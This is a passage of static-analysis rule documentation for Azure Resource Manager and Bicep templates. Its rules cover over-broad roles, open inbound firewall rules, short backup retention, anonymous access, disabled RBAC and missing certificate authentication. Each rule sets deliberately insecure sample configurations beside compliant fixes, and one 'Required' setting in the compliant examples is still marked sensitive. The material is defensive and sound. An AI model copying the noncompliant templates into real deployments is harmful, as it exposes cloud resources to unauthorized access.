resource acrAdminUserDisabled 'Microsoft.ContainerRegistry/registries@2021-09-01' = {
  properties: {
    adminUserEnabled: true // Noncompliant
  }
}

Compliant Solution

For Azure Batch Pools:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Batch/batchAccounts/pools",
            "apiVersion": "2022-10-01",
            "properties": {
                "startTask": {
                    "userIdentity": {
                        "autoUser": {
                            "elevationLevel": "NonAdmin"
                        }
                    }
                }
            }
        }
    ]
}
resource AdminBatchPool 'Microsoft.Batch/batchAccounts/pools@2022-10-01' = {
  properties: {
    startTask: {
      userIdentity: {
        autoUser: {
          elevationLevel: 'NonAdmin' // Compliant
        }
      }
    }
  }
}

For Azure Container Registries:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.ContainerRegistry/registries",
            "apiVersion": "2023-01-01-preview",
            "properties": {
                "adminUserEnabled": false
            }
        }
    ]
}
resource acrAdminUserDisabled 'Microsoft.ContainerRegistry/registries@2021-09-01' = {
  properties: {
    adminUserEnabled: false // Compliant
  }
}

See

azureresourcemanager:S6385

Why is this an issue?

Defining a custom role for a Subscription or a Management group that allows all actions will give them the same capabilities as the built-in Owner role. It’s recommended to limit the number of subscription owners in order to mitigate the risk of being breached by a compromised owner.

This rule raises an issue when a custom role has an assignable scope set to a Subscription or a Management Group and allows all actions (*) ¨

How to fix it

Code examples

Noncompliant code example

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Authorization/roleDefinitions",
      "apiVersion": "2022-04-01",
      "properties": {
        "permissions": [
          {
            "actions": ["*"],
            "notActions": []
          }
        ],
        "assignableScopes": [
          "[subscription().id]"
        ]
      }
    }
  ]
}
targetScope = 'managementGroup'

resource roleDef 'Microsoft.Authorization/roleDefinitions@2022-04-01' = { // Sensitive
  properties: {
    permissions: [
      {
        actions: ['*']
        notActions: []
      }
    ]

    assignableScopes: [
      managementGroup().id
    ]
  }
}

Compliant solution

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Authorization/roleDefinitions",
      "apiVersion": "2022-04-01",
      "properties": {
        "permissions": [
          {
            "actions": ["Microsoft.Compute/*"],
            "notActions": []
          }
        ],
        "assignableScopes": [
          "[subscription().id]"
        ]
      }
    }
  ]
}
targetScope = 'managementGroup'

resource roleDef 'Microsoft.Authorization/roleDefinitions@2022-04-01' = {
  properties: {
    permissions: [
      {
        actions: ['Microsoft.Compute/*']
        notActions: []
      }
    ]

    assignableScopes: [
      managementGroup().id
    ]
  }
}

Going the extra mile

Here is a list of recommendations that can be followed regarding good usages of roles: * Apply the least privilege principle by creating a custom role with as few permissions as possible. * As custom role can be updated, gradually add atomic permissions when required. * Limit the assignable scopes of the custom role to a set of Resources or Ressource Groups. * When necessary, use the built-in Owner role instead of a custom role granting subscription owner capabilities. * Limit the assignments of Owner roles to less than three people or service principals.

Resources

Documentation

azureresourcemanager:S6387

Azure RBAC roles can be assigned to users, groups, or service principals. A role assignment grants permissions on a predefined set of resources called "scope".

The widest scopes a role can be assigned to are:

  • Subscription: a role assigned with this scope grants access to all resources of this Subscription.
  • Management Group: a scope assigned with this scope grants access to all resources of all the Subscriptions in this Management Group.

In case of security incidents involving a compromised identity (user, group, or service principal), limiting its role assignment to the narrowest scope possible helps separate duties and limits what resources are at risk.

Ask Yourself Whether

  • The user, group, or service principal doesn’t use the entirety of the resources in the scope to operate on a day-to-day basis.
  • It is possible to follow the Separation of Duties principle and split the scope into multiple role assignments with a narrower scope.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

  • Limit the scope of the role assignment to a Resource or Resource Group.
  • Apply the least privilege principle by assigning roles granting as few permissions as possible.

Sensitive Code Example

{
  "$schema": "https://schema.management.azure.com/schemas/2018-05-01/subscriptionDeploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Authorization/roleAssignments",
      "apiVersion": "2022-04-01",
      "name": "[guid(subscription().id, 'exampleRoleAssignment')]"
    }
  ]
}

Compliant Solution

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Authorization/roleAssignments",
      "apiVersion": "2022-04-01",
      "name": "[guid(resourceGroup().id, 'exampleRoleAssignment')]"
    }
  ]
}

See

azureresourcemanager:S6321

Why is this an issue?

Cloud platforms such as Azure support virtual firewalls that can be used to restrict access to services by controlling inbound and outbound traffic.
Any firewall rule allowing traffic from all IP addresses to standard network ports on which administration services traditionally listen, such as 22 for SSH, can expose these services to exploits and unauthorized access.

What is the potential impact?

Like any other service, administration services can contain vulnerabilities. Administration services run with elevated privileges and thus a vulnerability could have a high impact on the system.

Additionally, credentials might be leaked through phishing or similar techniques. Attackers who are able to reach the services could use the credentials to log in to the system.

How to fix it

It is recommended to restrict access to remote administration services to only trusted IP addresses. In practice, trusted IP addresses are those held by system administrators or those of bastion-like servers.

Code examples

Noncompliant code example

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Network/networkSecurityGroups/securityRules",
            "apiVersion": "2022-11-01",
            "properties": {
                "protocol": "*",
                "destinationPortRange": "*",
                "sourceAddressPrefix": "*",
                "access": "Allow",
                "direction": "Inbound"
            }
        }
    ]
}
resource securityRules 'Microsoft.Network/networkSecurityGroups/securityRules@2022-11-01' = {
  name: 'securityRules'
  properties: {
    direction: 'Inbound'
    access: 'Allow'
    protocol: '*'
    destinationPortRange: '*'
    sourceAddressPrefix: '*'
  }
}

Compliant solution

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Network/networkSecurityGroups/securityRules",
            "apiVersion": "2022-11-01",
            "properties": {
                "protocol": "*",
                "destinationPortRange": "22",
                "sourceAddressPrefix": "10.0.0.0/24",
                "access": "Allow",
                "direction": "Inbound"
            }
        }
    ]
}
resource securityRules 'Microsoft.Network/networkSecurityGroups/securityRules@2022-11-01' = {
  name: 'securityRules'
  properties: {
    direction: 'Inbound'
    access: 'Allow'
    protocol: '*'
    destinationPortRange: '22'
    sourceAddressPrefix: '10.0.0.0/24'
  }
}

Resources

Documentation

Standards

azureresourcemanager:S6364

Reducing the backup retention duration can reduce an organization’s ability to re-establish service in case of a security incident.

Data backups allow to overcome corruption or unavailability of data by recovering as efficiently as possible from a security incident.

Backup retention duration, coverage, and backup locations are essential criteria regarding functional continuity.

Ask Yourself Whether

  • This component is essential for the information system infrastructure.
  • This component is essential for mission-critical functions.
  • Compliance policies require this component to be backed up for a specific amount of time.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Increase the backup retention period to an amount of time sufficient enough to be able to restore service in case of an incident.

Sensitive Code Example

For Azure App Service:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2022-03-01",
      "name": "webApp",
    },
    {
      "type": "Microsoft.Web/sites/config",
      "apiVersion": "2022-03-01",
      "name": "webApp/backup",
      "properties": {
        "backupSchedule": {
          "frequencyInterval": 1,
          "frequencyUnit": "Day",
          "keepAtLeastOneBackup": true,
          "retentionPeriodInDays": 2
        }
      },
      "dependsOn": [
        "[resourceId('Microsoft.Web/sites', 'webApp')]"
      ]
    }
  ]
}

For Azure Cosmos DB accounts:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DocumentDB/databaseAccounts",
      "apiVersion": "2023-04-15",
      "properties": {
        "backupPolicy": {
          "type": "Periodic",
          "periodicModeProperties": {
            "backupIntervalInMinutes": 1440,
            "backupRetentionIntervalInHours": 8
          }
        }
      }
    }
  ]
}

For Azure Backup vault policies:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.RecoveryServices/vaults",
      "apiVersion": "2023-01-01",
      "name": "testVault",
      "resources": [
        {
          "type": "backupPolicies",
          "apiVersion": "2023-01-01",
          "name": "testVault/backupPolicy",
          "properties": {
            "backupManagementType": "AzureSql",
            "retentionPolicy": {
              "retentionPolicyType": "SimpleRetentionPolicy",
              "retentionDuration": {
                "count": 2,
                "durationType": "Days"
              }
            }
          }
        }
      ]
    }
  ]
}

Compliant Solution

For Azure App Service:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2022-03-01",
      "name": "webApp",
    },
    {
      "type": "Microsoft.Web/sites/config",
      "apiVersion": "2022-03-01",
      "name": "webApp/backup",
      "properties": {
        "backupSchedule": {
          "frequencyInterval": 1,
          "frequencyUnit": "Day",
          "keepAtLeastOneBackup": true,
          "retentionPeriodInDays": 15
        }
      },
      "dependsOn": [
        "[resourceId('Microsoft.Web/sites', 'webApp')]"
      ]
    }
  ]
}

For Azure Cosmos DB accounts:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DocumentDB/databaseAccounts",
      "apiVersion": "2023-04-15",
      "properties": {
        "backupPolicy": {
          "type": "Periodic",
          "periodicModeProperties": {
            "backupIntervalInMinutes": 1440,
            "backupRetentionIntervalInHours": 360
          }
        }
      }
    }
  ]
}

For Azure Backup vault policies:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.RecoveryServices/vaults",
      "apiVersion": "2023-01-01",
      "name": "testVault",
      "resources": [
        {
          "type": "backupPolicies",
          "apiVersion": "2023-01-01",
          "name": "testVault/backupPolicy",
          "properties": {
            "backupManagementType": "AzureSql",
            "retentionPolicy": {
              "retentionPolicyType": "SimpleRetentionPolicy",
              "retentionDuration": {
                "count": 8,
                "durationType": "Days"
              }
            }
          }
        }
      ]
    }
  ]
}
azureresourcemanager:S6381

Azure Resource Manager offers built-in roles that can be assigned to users, groups, or service principals. Some of these roles should be carefully assigned as they grant sensitive permissions like the ability to reset passwords for all users.

An Azure account that fails to limit the use of such roles has a higher risk of being breached by a compromised owner.

This rule raises an issue when one of the following roles is assigned:

  • Contributor (b24988ac-6180-42a0-ab88-20f7382dd24c)
  • Owner (8e3af657-a8ff-443c-a75c-2fe8c4bcb635)
  • User Access Administrator (18d7d88d-d35e-4fb5-a5c3-7773c20a72d9)

Ask Yourself Whether

  • The user, group, or service principal doesn’t use the entirety of this extensive set of permissions to operate on a day-to-day basis.
  • It is possible to follow the Separation of Duties principle and split permissions between multiple users, but it’s not enforced. There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

  • Limit the assignment of Owner roles to less than 3 people or service principals.
  • Apply the least privilege principle by choosing a role with a limited set of permissions.
  • If no built-in role meets your needs, create a custom role with as few permissions as possible.

Sensitive Code Example

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Authorization/roleAssignments",
      "apiVersion": "2022-04-01",
      "properties": {
        "description": "Assign the contributor role",
        "principalId": "string",
        "principalType": "ServicePrincipal",
        "roleDefinitionId": "[resourceId('Microsoft.Authorization/roleDefinitions', 'b24988ac-6180-42a0-ab88-20f7382dd24c')]"
      }
    }
  ]
}
resource symbolicname 'Microsoft.Authorization/roleAssignments@2022-04-01' = {
  scope: tenant()
  properties: {
    description: 'Assign the contributor role'
    principalId: 'string'
    principalType: 'ServicePrincipal'
    roleDefinitionId: resourceId('Microsoft.Authorization/roleAssignments', 'b24988ac-6180-42a0-ab88-20f7382dd24c')
  }
}

Compliant Solution

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Authorization/roleAssignments",
      "apiVersion": "2022-04-01",
      "properties": {
        "description": "Assign the reader role",
        "principalId": "string",
        "principalType": "ServicePrincipal",
        "roleDefinitionId": "[resourceId('Microsoft.Authorization/roleDefinitions', 'acdd72a7-3385-48ef-bd42-f606fba81ae7')]"
      }
    }
  ]
}
resource symbolicname 'Microsoft.Authorization/roleAssignments@2022-04-01' = {
  scope: tenant()
  properties: {
    description: 'Assign the reader role'
    principalId: 'string'
    principalType: 'ServicePrincipal'
    roleDefinitionId: resourceId('Microsoft.Authorization/roleAssignments', 'acdd72a7-3385-48ef-bd42-f606fba81ae7')
  }
}

See

azureresourcemanager:S6380

Allowing anonymous access can reduce an organization’s ability to protect itself against attacks on its Azure resources.

Security incidents may include disrupting critical functions, data theft, and additional Azure subscription costs due to resource overload.

Using authentication coupled with fine-grained authorizations helps bring defense-in-depth and bring traceability to investigators of security incidents.

Depending on the affected Azure resource, multiple authentication choices are possible: Active Directory Authentication, OpenID implementations (Google, Microsoft, etc.) or native Azure mechanisms.

Ask Yourself Whether

  • This Azure resource is essential for the information system infrastructure.
  • This Azure resource is essential for mission-critical functions.
  • This Azure resource stores or processes sensitive data.
  • Compliance policies require access to this resource to be authenticated.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Enable authentication in this Azure resource, and disable anonymous access.

If only Basic Authentication is available, enable it.

Sensitive Code Example

For App Service:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Web/sites",
            "apiVersion": "2022-03-01",
            "name": "example"
        }
    ]
}

For API Management:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.ApiManagement/service",
            "apiVersion": "2022-09-01-preview",
            "name": "example"
        }
    ]
}

For Data Factory Linked Services:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.DataFactory/factories/linkedservices",
            "apiVersion": "2018-06-01",
            "name": "example",
            "properties": {
                "type": "Web",
                "typeProperties": {
                    "authenticationType": "Anonymous"
                }
            }
        }
    ]
}

For Storage Accounts and Storage Containers:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Storage/storageAccounts",
            "apiVersion": "2022-09-01",
            "name": "example",
            "properties": {
                "allowBlobPublicAccess": true
            }
        }
    ]
}
{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Storage/storageAccounts",
            "apiVersion": "2022-09-01",
            "name": "example",
            "resources": [
                {
                    "type": "blobServices/containers",
                    "apiVersion": "2022-09-01",
                    "name": "blobContainerExample",
                    "properties": {
                        "publicAccess": "Blob"
                    }
                }
            ]
        }
    ]
}

For Redis Caches:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Cache/redis",
            "apiVersion": "2022-06-01",
            "name": "example",
            "properties": {
                "redisConfiguration": {
                    "authnotrequired": "true"
                }
            }
        }
    ]
}

Compliant Solution

For App Services and equivalent:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Web/sites",
            "apiVersion": "2022-03-01",
            "name": "example",
            "resources": [
                {
                    "type": "config",
                    "apiVersion": "2022-03-01",
                    "name": "authsettingsV2",
                    "properties": {
                        "globalValidation": {
                            "requireAuthentication": true,
                            "unauthenticatedClientAction": "RedirectToLoginPage"
                        }
                    }
                }
            ]
        }
    ]
}

For API Management:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.ApiManagement/service",
            "apiVersion": "2022-09-01-preview",
            "name": "example",
            "resources": [
                {
                    "type": "portalsettings",
                    "apiVersion": "2022-09-01-preview",
                    "name": "signin",
                    "properties": {
                        "enabled": true
                    }
                },
                {
                    "type": "apis",
                    "apiVersion": "2022-09-01-preview",
                    "name": "exampleApi",
                    "properties": {
                        "authenticationSettings": {
                            "openid": {
                                "bearerTokenSendingMethods": ["authorizationHeader"],
                                "openidProviderId": "<an OpenID provider ID>"
                            }
                        }
                    }
                }
            ]
        }
    ]
}

For Data Factory Linked Services:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.DataFactory/factories/linkedservices",
            "apiVersion": "2018-06-01",
            "name": "example",
            "properties": {
                "type": "Web",
                "typeProperties": {
                    "authenticationType": "Basic"
                }
            }
        }
    ]
}

For Storage Accounts:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Storage/storageAccounts",
            "apiVersion": "2022-09-01",
            "name": "example",
            "properties": {
                "allowBlobPublicAccess": false
            }
        }
    ]
}
{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Storage/storageAccounts",
            "apiVersion": "2022-09-01",
            "name": "example",
            "resources": [
                {
                    "type": "blobServices/containers",
                    "apiVersion": "2022-09-01",
                    "name": "blobContainerExample",
                    "properties": {
                        "publicAccess": "None"
                    }
                }
            ]
        }
    ]
}

For Redis Caches:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Cache/redis",
            "apiVersion": "2022-06-01",
            "name": "example",
            "properties": {
                "redisConfiguration": {}
            }
        }
    ]
}

See

azureresourcemanager:S6383

Disabling Role-Based Access Control (RBAC) on Azure resources can reduce an organization’s ability to protect itself against access controls being compromised.

To be considered safe, access controls must follow the principle of least privilege and correctly segregate duties amongst users. RBAC helps enforce these practices by adapting the organization’s access control needs into explicit role-based policies: It helps keeping access controls maintainable and sustainable.

Furthermore, RBAC allows operations teams to work faster during a security incident. It helps to mitigate account theft or intrusions by quickly shutting down accesses.

Ask Yourself Whether

  • This Azure resource is essential for the information system infrastructure.
  • This Azure resource is essential for mission-critical functions.
  • Compliance policies require access to this resource to be enforced through the use of Role-Based Access Control.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Enable Azure RBAC when the Azure resource supports it.
  • For Kubernetes clusters, enable Azure RBAC if Azure AD integration is supported. Otherwise, use the built-in Kubernetes RBAC.

Sensitive Code Example

For AKS Azure Kubernetes Service:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.ContainerService/managedClusters",
      "apiVersion": "2023-03-01",
      "properties": {
        "aadProfile": {
          "enableAzureRBAC": false
        },
        "enableRBAC": false
      }
    }
  ]
}
resource aks 'Microsoft.ContainerService/managedClusters@2023-03-01' = {
  properties: {
    aadProfile: {
      enableAzureRBAC: false    // Sensitive
    }
    enableRBAC: false           // Sensitive
  }
}

For Key Vault:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.KeyVault/vaults",
      "apiVersion": "2022-07-01",
      "properties": {
        "enableRbacAuthorization": false
      }
    }
  ]
}
resource keyVault 'Microsoft.KeyVault/vaults@2022-07-01' = {
  properties: {
    enableRbacAuthorization: false    // Sensitive
  }
}

Compliant Solution

For AKS Azure Kubernetes Service:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.ContainerService/managedClusters",
      "apiVersion": "2023-03-01",
      "properties": {
        "aadProfile": {
          "enableAzureRBAC": true
        },
        "enableRBAC": true
      }
    }
  ]
}
resource aks 'Microsoft.ContainerService/managedClusters@2023-03-01' = {
  properties: {
    aadProfile: {
      enableAzureRBAC: true     // Compliant
    }
    enableRBAC: true            // Compliant
  }
}

For Key Vault:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.KeyVault/vaults",
      "apiVersion": "2022-07-01",
      "properties": {
        "enableRbacAuthorization": true
      }
    }
  ]
}
resource keyVault 'Microsoft.KeyVault/vaults@2022-07-01' = {
  properties: {
    enableRbacAuthorization: true    // Compliant
  }
}

See

azureresourcemanager:S6382

Disabling certificate-based authentication can reduce an organization’s ability to react against attacks on its critical functions and data.

Azure offers various authentication options to access resources: Anonymous connections, Basic authentication, password-based authentication, and certificate-based authentication.

Choosing certificate-based authentication helps bring client/host trust by allowing the host to verify the client and vice versa. It cannot be forged or forwarded by a man-in-the-middle eavesdropper, and the certificate’s private key is never sent over the network so it’s harder to steal than a password.

In case of a security incident, certificates help bring investigators traceability and allow security operations teams to react faster. For example, all compromised certificates could be revoked individually, or an issuing certificate could be revoked which causes all the certificates it issued to become untrusted.

Ask Yourself Whether

  • This Azure resource is essential for the information system infrastructure.
  • This Azure resource is essential for mission-critical functions.
  • Compliance policies require access to this resource to be authenticated with certificates.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Enable certificate-based authentication.

Sensitive Code Example

Where the use of client certificates is controlled by a boolean value, such as:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.SignalRService/webPubSub",
      "apiVersion": "2020-07-01-preview",
      "name": "example",
      "properties": {
        "tls": {
          "clientCertEnabled": false
        }
      }
    }
  ]
}
resource example 'Microsoft.SignalRService/webPubSub@2020-07-01-preview' = {
  name: 'example'
  properties: {
    tls: {
      clientCertEnabled: false // Sensitive
    }
  }
}
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2015-08-01",
      "name": "example",
      "properties": {
        "clientCertEnabled": false
      }
    }
  ]
}
resource example 'Microsoft.Web/sites@2015-08-01' = {
  name: 'example'
  properties: {
    clientCertEnabled: false // Sensitive
  }
}

Where the use of client certificates can be made optional, such as:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2015-08-01",
      "name": "example",
      "properties": {
        "clientCertEnabled": true,
        "clientCertMode": "Optional"
      }
    }
  ]
}
resource example 'Microsoft.Web/sites@2015-08-01' = {
  name: 'example'
  properties: {
    clientCertEnabled: true
    clientCertMode: 'Optional' // Sensitive
  }
}
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.App/containerApps",
      "apiVersion": "2022-03-01",
      "name": "example",
      "properties": {
        "ingress": {
          "clientCertificateMode": "accept"
        }
      }
    }
  ]
}
resource example 'Microsoft.App/containerApps@2022-03-01' = {
  name: 'example'
  properties: {
    ingress: {
      clientCertificateMode: 'accept' // Sensitive
    }
  }
}

Where client certificates can be used to authenticate outbound requests, such as:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DataFactory/factories/linkedservices",
      "apiVersion": "2018-06-01",
      "name": "example",
      "properties": {
        "type": "Web",
        "typeProperties": {
          "authenticationType": "Basic"
        }
      }
    }
  ]
}
resource example 'Microsoft.DataFactory/factories/linkedservices@2018-06-01' = {
  name: 'example'
  properties: {
    type: 'Web'
    typeProperties: {
      authenticationType: 'Basic' // Sensitive
    }
  }
}

Where a list of permitted client certificates must be provided, such as:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DocumentDB/cassandraClusters",
      "apiVersion": "2021-10-15",
      "name": "example",
      "properties": {
        "clientCertificates": []
      }
    }
  ]
}
resource example 'Microsoft.DocumentDB/cassandraClusters@2021-10-15' = {
  name: 'example'
  properties: {
    clientCertificates: [] // Sensitive
  }
}

Where a resouce can use both certificate-based and password-based authentication, such as:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.ContainerRegistry/registries/tokens",
      "apiVersion": "2022-12-01",
      "name": "example",
      "properties": {
        "credentials": {
          "passwords": [
            {
              "name": "password1"
            }
          ]
        }
      }
    }
  ]
}
resource example 'Microsoft.ContainerRegistry/registries/tokens@2022-12-01' = {
  name: 'example'
  properties: {
    credentials: {
      passwords: [ // Sensitive
        {
          name: 'password1'
        }
      ]
    }
  }
}

Compliant Solution

Where the use of client certificates is controlled by a boolean value:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.SignalRService/webPubSub",
      "apiVersion": "2020-07-01-preview",
      "name": "example",
      "properties": {
        "tls": {
          "clientCertEnabled": true
        }
      }
    }
  ]
}
resource example 'Microsoft.SignalRService/webPubSub@2020-07-01-preview' = {
  name: 'example'
  properties: {
    tls: {
      clientCertEnabled: true // Compliant
    }
  }
}
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2015-08-01",
      "name": "example",
      "properties": {
        "clientCertEnabled": true,
        "clientCertMode": "Required"
      }
    }
  ]
}
resource example 'Microsoft.Web/sites@2015-08-01' = {
  name: 'example'
  properties: {
    clientCertEnabled: true // Compliant
    clientCertMode: 'Required'
  }
}

Where the use of client certificates can be made optional:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2015-08-01",
      "name": "example",
      "properties": {
        "clientCertEnabled": true,
        "clientCertMode": "Required"
      }
    }
  ]
}
resource example 'Microsoft.Web/sites@2015-08-01' = {
  name: 'example'
  properties: {
    clientCertEnabled: true
    clientCertMode: 'Required' // Sensitive
  }
}
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.App/containerApps",
      "apiVersion": "2022-03-01",
      "name": "example",
      "properties": {
        "ingress": {
          "clientCertificateMode": "require"
        }
      }
    }
  ]
}
resource example 'Microsoft.App/containerApps@2022-03-01' = {
  name: 'example'
  properties: {
    ingress: {
      clientCertificateMode: 'require' // Sensitive
    }
  }
}

Where client certificates can be used to authenticate outbound requests:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DataFactory/factories/linkedservices",
      "apiVersion": "2018-06-01",
      "name": "example",
      "properties": {
        "type": "Web",
        "typeProperties": {
          "authenticationType": "ClientCertificate"
        }
      }
    }
  ]
}
resource example 'Microsoft.DataFactory/factories/linkedservices@2018-06-01' = {
  name: 'example'
  properties: {
    type: 'Web'
    typeProperties: {
      authenticationType: 'ClientCertificate' // Compliant
    }
  }
}

Where a list of permitted client certificates must be provided:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DocumentDB/cassandraClusters",
      "apiVersion": "2021-10-15",
      "name": "example",
      "properties": {
        "clientCertificates": [
          {
            "pem": "[base64-encoded certificate]"
          }
        ]
      }
    }
  ]
}
resource example 'Microsoft.DocumentDB/cassandraClusters@2021-10-15' = {
  name: 'example'
  properties: {
    clientCertificates: [ // Compliant
      {
        pem: '[base64-encoded certificate]'
      }
    ]
  }
}

Where a resouce can use both certificate-based and password-based authentication:

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.ContainerRegistry/registries/tokens",
      "apiVersion": "2022-12-01",
      "name": "example",
      "properties": {
        "credentials": {
          "certificates": [
            {
              "name": "certificate1",
